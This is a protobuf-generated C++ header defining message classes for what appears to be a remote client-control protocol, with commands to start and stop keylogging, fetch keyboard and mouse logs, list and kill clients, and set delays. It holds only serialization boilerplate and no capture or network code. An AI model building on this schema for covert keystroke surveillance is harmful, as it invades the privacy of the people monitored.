// Generated by the protocol buffer compiler.  DO NOT EDIT!
// source: Proto/SpiderCommands.proto

#ifndef PROTOBUF_Proto_2fSpiderCommands_2eproto__INCLUDED
#define PROTOBUF_Proto_2fSpiderCommands_2eproto__INCLUDED

#include <string>

#include <google/protobuf/stubs/common.h>

#if GOOGLE_PROTOBUF_VERSION < 3001000
#error This file was generated by a newer version of protoc which is
#error incompatible with your Protocol Buffer headers.  Please update
#error your headers.
#endif
#if 3001000 < GOOGLE_PROTOBUF_MIN_PROTOC_VERSION
#error This file was generated by an older version of protoc which is
#error incompatible with your Protocol Buffer headers.  Please
#error regenerate this file with a newer version of protoc.
#endif

#include <google/protobuf/arena.h>
#include <google/protobuf/arenastring.h>
#include <google/protobuf/generated_message_util.h>
#include <google/protobuf/metadata.h>
#include <google/protobuf/message.h>
#include <google/protobuf/repeated_field.h>
#include <google/protobuf/extension_set.h>
#include <google/protobuf/unknown_field_set.h>
// @@protoc_insertion_point(includes)

// Internal implementation detail -- do not call these.
void protobuf_AddDesc_Proto_2fSpiderCommands_2eproto();
void protobuf_InitDefaults_Proto_2fSpiderCommands_2eproto();
void protobuf_AssignDesc_Proto_2fSpiderCommands_2eproto();
void protobuf_ShutdownFile_Proto_2fSpiderCommands_2eproto();

class ClientList;
class ClientStatus;
class GetClientLog;
class GetClientMouseLog;
class GetClientStatus;
class KillClient;
class SetClientDelay;
class StartKeylogging;
class StopKeylogging;

// ===================================================================

class GetClientLog : public ::google::protobuf::Message /* @@protoc_insertion_point(class_definition:GetClientLog) */ {
 public:
  GetClientLog();
  virtual ~GetClientLog();

  GetClientLog(const GetClientLog& from);

  inline GetClientLog& operator=(const GetClientLog& from) {
    CopyFrom(from);
    return *this;
  }

  static const ::google::protobuf::Descriptor* descriptor();
  static const GetClientLog& default_instance();

  static const GetClientLog* internal_default_instance();

  void Swap(GetClientLog* other);

  // implements Message ----------------------------------------------

  inline GetClientLog* New() const { return New(NULL); }

  GetClientLog* New(::google::protobuf::Arena* arena) const;
  void CopyFrom(const ::google::protobuf::Message& from);
  void MergeFrom(const ::google::protobuf::Message& from);
  void CopyFrom(const GetClientLog& from);
  void MergeFrom(const GetClientLog& from);
  void Clear();
  bool IsInitialized() const;

  size_t ByteSizeLong() const;
  bool MergePartialFromCodedStream(
      ::google::protobuf::io::CodedInputStream* input);
  void SerializeWithCachedSizes(
      ::google::protobuf::io::CodedOutputStream* output) const;
  ::google::protobuf::uint8* InternalSerializeWithCachedSizesToArray(
      bool deterministic, ::google::protobuf::uint8* output) const;
  ::google::protobuf::uint8* SerializeWithCachedSizesToArray(::google::protobuf::uint8* output) const {
    return InternalSerializeWithCachedSizesToArray(false, output);
  }
  int GetCachedSize() const { return _cached_size_; }
  private:
  void SharedCtor();
  void SharedDtor();
  void SetCachedSize(int size) const;
  void InternalSwap(GetClientLog* other);
  void UnsafeMergeFrom(const GetClientLog& from);
  private:
  inline ::google::protobuf::Arena* GetArenaNoVirtual() const {
    return _internal_metadata_.arena();
  }
  inline void* MaybeArenaPtr() const {
    return _internal_metadata_.raw_arena_ptr();
  }
  public:

  ::google::protobuf::Metadata GetMetadata() const;

  // nested types ----------------------------------------------------

  // accessors -------------------------------------------------------

  // optional int32 limit = 1;
  void clear_limit();
  static const int kLimitFieldNumber = 1;
  ::google::protobuf::int32 limit() const;
  void set_limit(::google::protobuf::int32 value);

  // @@protoc_insertion_point(class_scope:GetClientLog)
 private:

  ::google::protobuf::internal::InternalMetadataWithArena _internal_metadata_;
  ::google::protobuf::int32 limit_;
  mutable int _cached_size_;
  friend void  protobuf_InitDefaults_Proto_2fSpiderCommands_2eproto_impl();
  friend void  protobuf_AddDesc_Proto_2fSpiderCommands_2eproto_impl();
  friend void protobuf_AssignDesc_Proto_2fSpiderCommands_2eproto();
  friend void protobuf_ShutdownFile_Proto_2fSpiderCommands_2eproto();

  void InitAsDefaultInstance();
};
extern ::google::protobuf::internal::ExplicitlyConstructed<GetClientLog> GetClientLog_default_instance_;

// -------------------------------------------------------------------

class GetClientMouseLog : public ::google::protobuf::Message /* @@protoc_insertion_point(class_definition:GetClientMouseLog) */ {
 public:
  GetClientMouseLog();
  virtual ~GetClientMouseLog();

  GetClientMouseLog(const GetClientMouseLog& from);

  inline GetClientMouseLog& operator=(const GetClientMouseLog& from) {
    CopyFrom(from);
    return *this;
  }

  static const ::google::protobuf::Descriptor* descriptor();
  static const GetClientMouseLog& default_instance();

  static const GetClientMouseLog* internal_default_instance();

  void Swap(GetClientMouseLog* other);

  // implements Message ----------------------------------------------

  inline GetClientMouseLog* New() const { return New(NULL); }

  GetClientMouseLog* New(::google::protobuf::Arena* arena) const;
  void CopyFrom(const ::google::protobuf::Message& from);
  void MergeFrom(const ::google::protobuf::Message& from);
  void CopyFrom(const GetClientMouseLog& from);
  void MergeFrom(const GetClientMouseLog& from);
  void Clear();
  bool IsInitialized() const;

  size_t ByteSizeLong() const;
  bool MergePartialFromCodedStream(
      ::google::protobuf::io::CodedInputStream* input);
  void SerializeWithCachedSizes(
      ::google::protobuf::io::CodedOutputStream* output) const;
  ::google::protobuf::uint8* InternalSerializeWithCachedSizesToArray(
      bool deterministic, ::google::protobuf::uint8* output) const;
  ::google::protobuf::uint8* SerializeWithCachedSizesToArray(::google::protobuf::uint8* output) const {
    return InternalSerializeWithCachedSizesToArray(false, output);
  }
  int GetCachedSize() const { return _cached_size_; }
  private:
  void SharedCtor();
  void SharedDtor();
  void SetCachedSize(int size) const;
  void InternalSwap(GetClientMouseLog* other);
  void UnsafeMergeFrom(const GetClientMouseLog& from);
  private:
  inline ::google::protobuf::Arena* GetArenaNoVirtual() const {
    return _internal_metadata_.arena();
  }
  inline void* MaybeArenaPtr() const {
    return _internal_metadata_.raw_arena_ptr();
  }
  public:

  ::google::protobuf::Metadata GetMetadata() const;

  // nested types ----------------------------------------------------

  // accessors -------------------------------------------------------

  // optional int32 limit = 1;
  void clear_limit();
  static const int kLimitFieldNumber = 1;
  ::google::protobuf::int32 limit() const;
  void set_limit(::google::protobuf::int32 value);

  // @@protoc_insertion_point(class_scope:GetClientMouseLog)
 private:

  ::google::protobuf::internal::InternalMetadataWithArena _internal_metadata_;
  ::google::protobuf::int32 limit_;
  mutable int _cached_size_;
  friend void  protobuf_InitDefaults_Proto_2fSpiderCommands_2eproto_impl();
  friend void  protobuf_AddDesc_Proto_2fSpiderCommands_2eproto_impl();
  friend void protobuf_AssignDesc_Proto_2fSpiderCommands_2eproto();
  friend void protobuf_ShutdownFile_Proto_2fSpiderCommands_2eproto();

  void InitAsDefaultInstance();
};
extern ::google::protobuf::internal::ExplicitlyConstructed<GetClientMouseLog> GetClientMouseLog_default_instance_;

// -------------------------------------------------------------------

class ClientList : public ::google::protobuf::Message /* @@protoc_insertion_point(class_definition:ClientList) */ {
 public:
  ClientList();
  virtual ~ClientList();

  ClientList(const ClientList& from);

  inline ClientList& operator=(const ClientList& from) {
    CopyFrom(from);
    return *this;
  }

  static const ::google::protobuf::Descriptor* descriptor();
  static const ClientList& default_instance();

  static const ClientList* internal_default_instance();

  void Swap(ClientList* other);

  // implements Message ----------------------------------------------

  inline ClientList* New() const { return New(NULL); }

  ClientList* New(::google::protobuf::Arena* arena) const;
  void CopyFrom(const ::google::protobuf::Message& from);
  void MergeFrom(const ::google::protobuf::Message& from);
  void CopyFrom(const ClientList& from);
  void MergeFrom(const ClientList& from);
  void Clear();
  bool IsInitialized() const;

  size_t ByteSizeLong() const;
  bool MergePartialFromCodedStream(
      ::google::protobuf::io::CodedInputStream* input);
  void SerializeWithCachedSizes(
      ::google::protobuf::io::CodedOutputStream* output) const;
  ::google::protobuf::uint8* InternalSerializeWithCachedSizesToArray(
      bool deterministic, ::google::protobuf::uint8* output) const;
  ::google::protobuf::uint8* SerializeWithCachedSizesToArray(::google::protobuf::uint8* output) const {
    return InternalSerializeWithCachedSizesToArray(false, output);
  }
  int GetCachedSize() const { return _cached_size_; }
  private:
  void SharedCtor();
  void SharedDtor();
  void SetCachedSize(int size) const;
  void InternalSwap(ClientList* other);
  void UnsafeMergeFrom(const ClientList& from);
  private:
  inline ::google::protobuf::Arena* GetArenaNoVirtual() const {
    return _internal_metadata_.arena();
  }
  inline void* MaybeArenaPtr() const {
    return _internal_metadata_.raw_arena_ptr();
  }
  public:

  ::google::protobuf::Metadata GetMetadata() const;

  // nested types ----------------------------------------------------

  // accessors -------------------------------------------------------

  // @@protoc_insertion_point(class_scope:ClientList)
 private:

  ::google::protobuf::internal::InternalMetadataWithArena _internal_metadata_;
  mutable int _cached_size_;
  friend void  protobuf_InitDefaults_Proto_2fSpiderCommands_2eproto_impl();
  friend void  protobuf_AddDesc_Proto_2fSpiderCommands_2eproto_impl();
  friend void protobuf_AssignDesc_Proto_2fSpiderCommands_2eproto();
  friend void protobuf_ShutdownFile_Proto_2fSpiderCommands_2eproto();

  void InitAsDefaultInstance();
};
extern ::google::protobuf::internal::ExplicitlyConstructed<ClientList> ClientList_default_instance_;

// -------------------------------------------------------------------

class GetClientStatus : public ::google::protobuf::Message /* @@protoc_insertion_point(class_definition:GetClientStatus) */ {
 public:
  GetClientStatus();
  virtual ~GetClientStatus();

  GetClientStatus(const GetClientStatus& from);

  inline GetClientStatus& operator=(const GetClientStatus& from) {
    CopyFrom(from);
    return *this;
  }

  static const ::google::protobuf::Descriptor* descriptor();
  static const GetClientStatus& default_instance();

  static const GetClientStatus* internal_default_instance();

  void Swap(GetClientStatus* other);

  // implements Message ----------------------------------------------

  inline GetClientStatus* New() const { return New(NULL); }

  GetClientStatus* New(::google::protobuf::Arena* arena) const;
  void CopyFrom(const ::google::protobuf::Message& from);
  void MergeFrom(const ::google::protobuf::Message& from);
  void CopyFrom(const GetClientStatus& from);
  void MergeFrom(const GetClientStatus& from);
  void Clear();
  bool IsInitialized() const;

  size_t ByteSizeLong() const;
  bool MergePartialFromCodedStream(
      ::google::protobuf::io::CodedInputStream* input);
  void SerializeWithCachedSizes(
      ::google::protobuf::io::CodedOutputStream* output) const;
  ::google::protobuf::uint8* InternalSerializeWithCachedSizesToArray(
      bool deterministic, ::google::protobuf::uint8* output) const;
  ::google::protobuf::uint8* SerializeWithCachedSizesToArray(::google::protobuf::uint8* output) const {
    return InternalSerializeWithCachedSizesToArray(false, output);
  }
  int GetCachedSize() const { return _cached_size_; }
  private:
  void SharedCtor();
  void SharedDtor();
  void SetCachedSize(int size) const;
  void InternalSwap(GetClientStatus* other);
  void UnsafeMergeFrom(const GetClientStatus& from);
  private:
  inline ::google::protobuf::Arena* GetArenaNoVirtual() const {
    return _internal_metadata_.arena();
  }
  inline void* MaybeArenaPtr() const {
    return _internal_metadata_.raw_arena_ptr();
  }
  public:

  ::google::protobuf::Metadata GetMetadata() const;

  // nested types ----------------------------------------------------

  // accessors -------------------------------------------------------

  // @@protoc_insertion_point(class_scope:GetClientStatus)
 private:

  ::google::protobuf::internal::InternalMetadataWithArena _internal_metadata_;
  mutable int _cached_size_;
  friend void  protobuf_InitDefaults_Proto_2fSpiderCommands_2eproto_impl();
  friend void  protobuf_AddDesc_Proto_2fSpiderCommands_2eproto_impl();
  friend void protobuf_AssignDesc_Proto_2fSpiderCommands_2eproto();
  friend void protobuf_ShutdownFile_Proto_2fSpiderCommands_2eproto();

  void InitAsDefaultInstance();
};
extern ::google::protobuf::internal::ExplicitlyConstructed<GetClientStatus> GetClientStatus_default_instance_;

// -------------------------------------------------------------------

class StartKeylogging : public ::google::protobuf::Message /* @@protoc_insertion_point(class_definition:StartKeylogging) */ {
 public:
  StartKeylogging();
  virtual ~StartKeylogging();

  StartKeylogging(const StartKeylogging& from);

  inline StartKeylogging& operator=(const StartKeylogging& from) {
    CopyFrom(from);
    return *this;
  }

  static const ::google::protobuf::Descriptor* descriptor();
  static const StartKeylogging& default_instance();

  static const StartKeylogging* internal_default_instance();

  void Swap(StartKeylogging* other);

  // implements Message ----------------------------------------------

  inline StartKeylogging* New() const { return New(NULL); }

  StartKeylogging* New(::google::protobuf::Arena* arena) const;
  void CopyFrom(const ::google::protobuf::Message& from);
  void MergeFrom(const ::google::protobuf::Message& from);
  void CopyFrom(const StartKeylogging& from);
  void MergeFrom(const StartKeylogging& from);
  void Clear();
  bool IsInitialized() const;

  size_t ByteSizeLong() const;
  bool MergePartialFromCodedStream(
      ::google::protobuf::io::CodedInputStream* input);
  void SerializeWithCachedSizes(
      ::google::protobuf::io::CodedOutputStream* output) const;
  ::google::protobuf::uint8* InternalSerializeWithCachedSizesToArray(
      bool deterministic, ::google::protobuf::uint8* output) const;
  ::google::protobuf::uint8* SerializeWithCachedSizesToArray(::google::protobuf::uint8* output) const {
    return InternalSerializeWithCachedSizesToArray(false, output);
  }
  int GetCachedSize() const { return _cached_size_; }
  private:
  void SharedCtor();
  void SharedDtor();
  void SetCachedSize(int size) const;
  void InternalSwap(StartKeylogging* other);
  void UnsafeMergeFrom(const StartKeylogging& from);
  private:
  inline ::google::protobuf::Arena* GetArenaNoVirtual() const {
    return _internal_metadata_.arena();
  }
  inline void* MaybeArenaPtr() const {
    return _internal_metadata_.raw_arena_ptr();
  }
  public:

  ::google::protobuf::Metadata GetMetadata() const;

  // nested types ----------------------------------------------------

  // accessors -------------------------------------------------------

  // @@protoc_insertion_point(class_scope:StartKeylogging)
 private:

  ::google::protobuf::internal::InternalMetadataWithArena _internal_metadata_;
  mutable int _cached_size_;
  friend void  protobuf_InitDefaults_Proto_2fSpiderCommands_2eproto_impl();
  friend void  protobuf_AddDesc_Proto_2fSpiderCommands_2eproto_impl();
  friend void protobuf_AssignDesc_Proto_2fSpiderCommands_2eproto();
  friend void protobuf_ShutdownFile_Proto_2fSpiderCommands_2eproto();

  void InitAsDefaultInstance();
};
extern ::google::protobuf::internal::ExplicitlyConstructed<StartKeylogging> StartKeylogging_default_instance_;

// -------------------------------------------------------------------

class StopKeylogging : public ::google::protobuf::Message /* @@protoc_insertion_point(class_definition:StopKeylogging) */ {
 public:
  StopKeylogging();
  virtual ~StopKeylogging();

  StopKeylogging(const StopKeylogging& from);

  inline StopKeylogging& operator=(const StopKeylogging& from) {
    CopyFrom(from);
    return *this;
  }

  static const ::google::protobuf::Descriptor* descriptor();
  static const StopKeylogging& default_instance();

  static const StopKeylogging* internal_default_instance();

  void Swap(StopKeylogging* other);

  // implements Message ----------------------------------------------

  inline StopKeylogging* New() const { return New(NULL); }

  StopKeylogging* New(::google::protobuf::Arena* arena) const;
  void CopyFrom(const ::google::protobuf::Message& from);
  void MergeFrom(const ::google::protobuf::Message& from);
  void CopyFrom(const StopKeylogging& from);
  void MergeFrom(const StopKeylogging& from);
  void Clear();
  bool IsInitialized() const;

  size_t ByteSizeLong() const;
  bool MergePartialFromCodedStream(
      ::google::protobuf::io::CodedInputStream* input);
  void SerializeWithCachedSizes(
      ::google::protobuf::io::CodedOutputStream* output) const;
  ::google::protobuf::uint8* InternalSerializeWithCachedSizesToArray(
      bool deterministic, ::google::protobuf::uint8* output) const;
  ::google::protobuf::uint8* SerializeWithCachedSizesToArray(::google::protobuf::uint8* output) const {
    return InternalSerializeWithCachedSizesToArray(false, output);
  }
  int GetCachedSize() const { return _cached_size_; }
  private:
  void SharedCtor();
  void SharedDtor();
  void SetCachedSize(int size) const;
  void InternalSwap(StopKeylogging* other);
  void UnsafeMergeFrom(const StopKeylogging& from);
  private:
  inline ::google::protobuf::Arena* GetArenaNoVirtual() const {
    return _internal_metadata_.arena();
  }
  inline void* MaybeArenaPtr() const {
    return _internal_metadata_.raw_arena_ptr();
  }
  public:

  ::google::protobuf::Metadata GetMetadata() const;

  // nested types ----------------------------------------------------

  // accessors -------------------------------------------------------

  // @@protoc_insertion_point(class_scope:StopKeylogging)
 private:

  ::google::protobuf::internal::InternalMetadataWithArena _internal_metadata_;
  mutable int _cached_size_;
  friend void  protobuf_InitDefaults_Proto_2fSpiderCommands_2eproto_impl();
  friend void  protobuf_AddDesc_Proto_2fSpiderCommands_2eproto_impl();
  friend void protobuf_AssignDesc_Proto_2fSpiderCommands_2eproto();
  friend void protobuf_ShutdownFile_Proto_2fSpiderCommands_2eproto();

  void InitAsDefaultInstance();
};
extern ::google::protobuf::internal::ExplicitlyConstructed<StopKeylogging> StopKeylogging_default_instance_;

// -------------------------------------------------------------------

class SetClientDelay : public ::google::protobuf::Message /* @@protoc_insertion_point(class_definition:SetClientDelay) */ {
 public:
  SetClientDelay();
  virtual ~SetClientDelay();

  SetClientDelay(const SetClientDelay& from);

  inline SetClientDelay& operator=(const SetClientDelay& from) {
    CopyFrom(from);
    return *this;
  }

  static const ::google::protobuf::Descriptor* descriptor();
  static const SetClientDelay& default_instance();

  static const SetClientDelay* internal_default_instance();

  void Swap(SetClientDelay* other);

  // implements Message ----------------------------------------------

  inline SetClientDelay* New() const { return New(NULL); }

  SetClientDelay* New(::google::protobuf::Arena* arena) const;
  void CopyFrom(const ::google::protobuf::Message& from);
  void MergeFrom(const ::google::protobuf::Message& from);
  void CopyFrom(const SetClientDelay& from);
  void MergeFrom(const SetClientDelay& from);
  void Clear();
  bool IsInitialized() const;

  size_t ByteSizeLong() const;
  bool MergePartialFromCodedStream(
      ::google::protobuf::io::CodedInputStream* input);
  void SerializeWithCachedSizes(
      ::google::protobuf::io::CodedOutputStream* output) const;
  ::google::protobuf::uint8* InternalSerializeWithCachedSizesToArray(
      bool deterministic, ::google::protobuf::uint8* output) const;
  ::google::protobuf::uint8* SerializeWithCachedSizesToArray(::google::protobuf::uint8* output) const {
    return InternalSerializeWithCachedSizesToArray(false, output);
  }
  int GetCachedSize() const { return _cached_size_; }
  private:
  void SharedCtor();
  void SharedDtor();
  void SetCachedSize(int size) const;
  void InternalSwap(SetClientDelay* other);
  void UnsafeMergeFrom(const SetClientDelay& from);
  private:
  inline ::google::protobuf::Arena* GetArenaNoVirtual() const {
    return _internal_metadata_.arena();
  }
  inline void* MaybeArenaPtr() const {
    return _internal_metadata_.raw_arena_ptr();
  }
  public:

  ::google::protobuf::Metadata GetMetadata() const;

  // nested types ----------------------------------------------------

  // accessors -------------------------------------------------------

  // optional int32 delay = 1;
  void clear_delay();
  static const int kDelayFieldNumber = 1;
  ::google::protobuf::int32 delay() const;
  void set_delay(::google::protobuf::int32 value);

  // @@protoc_insertion_point(class_scope:SetClientDelay)
 private:

  ::google::protobuf::internal::InternalMetadataWithArena _internal_metadata_;
  ::google::protobuf::int32 delay_;
  mutable int _cached_size_;
  friend void  protobuf_InitDefaults_Proto_2fSpiderCommands_2eproto_impl();
  friend void  protobuf_AddDesc_Proto_2fSpiderCommands_2eproto_impl();
  friend void protobuf_AssignDesc_Proto_2fSpiderCommands_2eproto();
  friend void protobuf_ShutdownFile_Proto_2fSpiderCommands_2eproto();

  void InitAsDefaultInstance();
};
extern ::google::protobuf::internal::ExplicitlyConstructed<SetClientDelay> SetClientDelay_default_instance_;

// -------------------------------------------------------------------

class ClientStatus : public ::google::protobuf::Message /* @@protoc_insertion_point(class_definition:ClientStatus) */ {
 public:
  ClientStatus();
  virtual ~ClientStatus();

  ClientStatus(const ClientStatus& from);

  inline ClientStatus& operator=(const ClientStatus& from) {
    CopyFrom(from);
    return *this;
  }

  static const ::google::protobuf::Descriptor* descriptor();
  static const ClientStatus& default_instance();

  static const ClientStatus* internal_default_instance();

  void Swap(ClientStatus* other);

  // implements Message ----------------------------------------------

  inline ClientStatus* New() const { return New(NULL); }

  ClientStatus* New(::google::protobuf::Arena* arena) const;
  void CopyFrom(const ::google::protobuf::Message& from);
  void MergeFrom(const ::google::protobuf::Message& from);
  void CopyFrom(const ClientStatus& from);
  void MergeFrom(const ClientStatus& from);
  void Clear();
  bool IsInitialized() const;

  size_t ByteSizeLong() const;
  bool MergePartialFromCodedStream(
      ::google::protobuf::io::CodedInputStream* input);
  void SerializeWithCachedSizes(
      ::google::protobuf::io::CodedOutputStream* output) const;
  ::google::protobuf::uint8* InternalSerializeWithCachedSizesToArray(
      bool deterministic, ::google::protobuf::uint8* output) const;
  ::google::protobuf::uint8* SerializeWithCachedSizesToArray(::google::protobuf::uint8* output) const {
    return InternalSerializeWithCachedSizesToArray(false, output);
  }
  int GetCachedSize() const { return _cached_size_; }
  private:
  void SharedCtor();
  void SharedDtor();
  void SetCachedSize(int size) const;
  void InternalSwap(ClientStatus* other);
  void UnsafeMergeFrom(const ClientStatus& from);
  private:
  inline ::google::protobuf::Arena* GetArenaNoVirtual() const {
    return _internal_metadata_.arena();
  }
  inline void* MaybeArenaPtr() const {
    return _internal_metadata_.raw_arena_ptr();
  }
  public:

  ::google::protobuf::Metadata GetMetadata() const;

  // nested types ----------------------------------------------------

  // accessors -------------------------------------------------------

  // @@protoc_insertion_point(class_scope:ClientStatus)
 private:

  ::google::protobuf::internal::InternalMetadataWithArena _internal_metadata_;
  mutable int _cached_size_;
  friend void  protobuf_InitDefaults_Proto_2fSpiderCommands_2eproto_impl();
  friend void  protobuf_AddDesc_Proto_2fSpiderCommands_2eproto_impl();
  friend void protobuf_AssignDesc_Proto_2fSpiderCommands_2eproto();
  friend void protobuf_ShutdownFile_Proto_2fSpiderCommands_2eproto();

  void InitAsDefaultInstance();
};
extern ::google::protobuf::internal::ExplicitlyConstructed<ClientStatus> ClientStatus_default_instance_;

// -------------------------------------------------------------------

class KillClient : public ::google::protobuf::Message /* @@protoc_insertion_point(class_definition:KillClient) */ {
 public:
  KillClient();
  virtual ~KillClient();

  KillClient(const KillClient& from);

  inline KillClient& operator=(const KillClient& from) {
    CopyFrom(from);
    return *this;
  }

  static const ::google::protobuf::Descriptor* descriptor();
  static const KillClient& default_instance();

  static const KillClient* internal_default_instance();

  void Swap(KillClient* other);

  // implements Message ----------------------------------------------

  inline KillClient* New() const { return New(NULL); }

  KillClient* New(::google::protobuf::Arena* arena) const;
  void CopyFrom(const ::google::protobuf::Message& from);
  void MergeFrom(const ::google::protobuf::Message& from);
  void CopyFrom(const KillClient& from);
  void MergeFrom(const KillClient& from);
  void Clear();
  bool IsInitialized() const;

  size_t ByteSizeLong() const;
  bool MergePartialFromCodedStream(
      ::google::protobuf::io::CodedInputStream* input);
  void SerializeWithCachedSizes(
      ::google::protobuf::io::CodedOutputStream* output) const;
  ::google::protobuf::uint8* InternalSerializeWithCachedSizesToArray(
      bool deterministic, ::google::protobuf::uint8* output) const;
  ::google::protobuf::uint8* SerializeWithCachedSizesToArray(::google::protobuf::uint8* output) const {
    return InternalSerializeWithCachedSizesToArray(false, output);
  }
  int GetCachedSize() const { return _cached_size_; }
  private:
  void SharedCtor();
  void SharedDtor();
  void SetCachedSize(int size) const;
  void InternalSwap(KillClient* other);
  void UnsafeMergeFrom(const KillClient& from);
  private:
  inline ::google::protobuf::Arena* GetArenaNoVirtual() const {
    return _internal_metadata_.arena();
  }
  inline void* MaybeArenaPtr() const {
    return _internal_metadata_.raw_arena_ptr();
  }
  public:

  ::google::protobuf::Metadata GetMetadata() const;

  // nested types ----------------------------------------------------

  // accessors -------------------------------------------------------

  // @@protoc_insertion_point(class_scope:KillClient)
 private:

  ::google::protobuf::internal::InternalMetadataWithArena _internal_metadata_;
  mutable int _cached_size_;
  friend void  protobuf_InitDefaults_Proto_2fSpiderCommands_2eproto_impl();
  friend void  protobuf_AddDesc_Proto_2fSpiderCommands_2eproto_impl();
  friend void protobuf_AssignDesc_Proto_2fSpiderCommands_2eproto();
  friend void protobuf_ShutdownFile_Proto_2fSpiderCommands_2eproto();

  void InitAsDefaultInstance();
};
extern ::google::protobuf::internal::ExplicitlyConstructed<KillClient> KillClient_default_instance_;

// ===================================================================


// ===================================================================

#if !PROTOBUF_INLINE_NOT_IN_HEADERS
// GetClientLog

// optional int32 limit = 1;
inline void GetClientLog::clear_limit() {
  limit_ = 0;
}
inline ::google::protobuf::int32 GetClientLog::limit() const {
  // @@protoc_insertion_point(field_get:GetClientLog.limit)
  return limit_;
}
inline void GetClientLog::set_limit(::google::protobuf::int32 value) {
  
  limit_ = value;
  // @@protoc_insertion_point(field_set:GetClientLog.limit)
}

inline const GetClientLog* GetClientLog::internal_default_instance() {
  return &GetClientLog_default_instance_.get();
}
// -------------------------------------------------------------------

// GetClientMouseLog

// optional int32 limit = 1;
inline void GetClientMouseLog::clear_limit() {
  limit_ = 0;
}
inline ::google::protobuf::int32 GetClientMouseLog::limit() const {
  // @@protoc_insertion_point(field_get:GetClientMouseLog.limit)
  return limit_;
}
inline void GetClientMouseLog::set_limit(::google::protobuf::int32 value) {
  
  limit_ = value;
  // @@protoc_insertion_point(field_set:GetClientMouseLog.limit)
}

inline const GetClientMouseLog* GetClientMouseLog::internal_default_instance() {
  return &GetClientMouseLog_default_instance_.get();
}
// -------------------------------------------------------------------

// ClientList

inline const ClientList* ClientList::internal_default_instance() {
  return &ClientList_default_instance_.get();
}
// -------------------------------------------------------------------

// GetClientStatus

inline const GetClientStatus* GetClientStatus::internal_default_instance() {
  return &GetClientStatus_default_instance_.get();
}
// -------------------------------------------------------------------

// StartKeylogging

inline const StartKeylogging* StartKeylogging::internal_default_instance() {
  return &StartKeylogging_default_instance_.get();
}
// -------------------------------------------------------------------

// StopKeylogging

inline const StopKeylogging* StopKeylogging::internal_default_instance() {
  return &StopKeylogging_default_instance_.get();
}
// -------------------------------------------------------------------

// SetClientDelay

// optional int32 delay = 1;
inline void SetClientDelay::clear_delay() {
  delay_ = 0;
}
inline ::google::protobuf::int32 SetClientDelay::delay() const {
  // @@protoc_insertion_point(field_get:SetClientDelay.delay)
  return delay_;
}
inline void SetClientDelay::set_delay(::google::protobuf::int32 value) {
  
  delay_ = value;
  // @@protoc_insertion_point(field_set:SetClientDelay.delay)
}

inline const SetClientDelay* SetClientDelay::internal_default_instance() {
  return &SetClientDelay_default_instance_.get();
}
// -------------------------------------------------------------------

// ClientStatus

inline const ClientStatus* ClientStatus::internal_default_instance() {
  return &ClientStatus_default_instance_.get();
}
// -------------------------------------------------------------------

// KillClient

inline const KillClient* KillClient::internal_default_instance() {
  return &KillClient_default_instance_.get();
}
#endif  // !PROTOBUF_INLINE_NOT_IN_HEADERS
// -------------------------------------------------------------------

// -------------------------------------------------------------------

// -------------------------------------------------------------------

// -------------------------------------------------------------------

// -------------------------------------------------------------------

// -------------------------------------------------------------------

// -------------------------------------------------------------------

// -------------------------------------------------------------------


// @@protoc_insertion_point(namespace_scope)

// @@protoc_insertion_point(global_scope)

#endif  // PROTOBUF_Proto_2fSpiderCommands_2eproto__INCLUDED
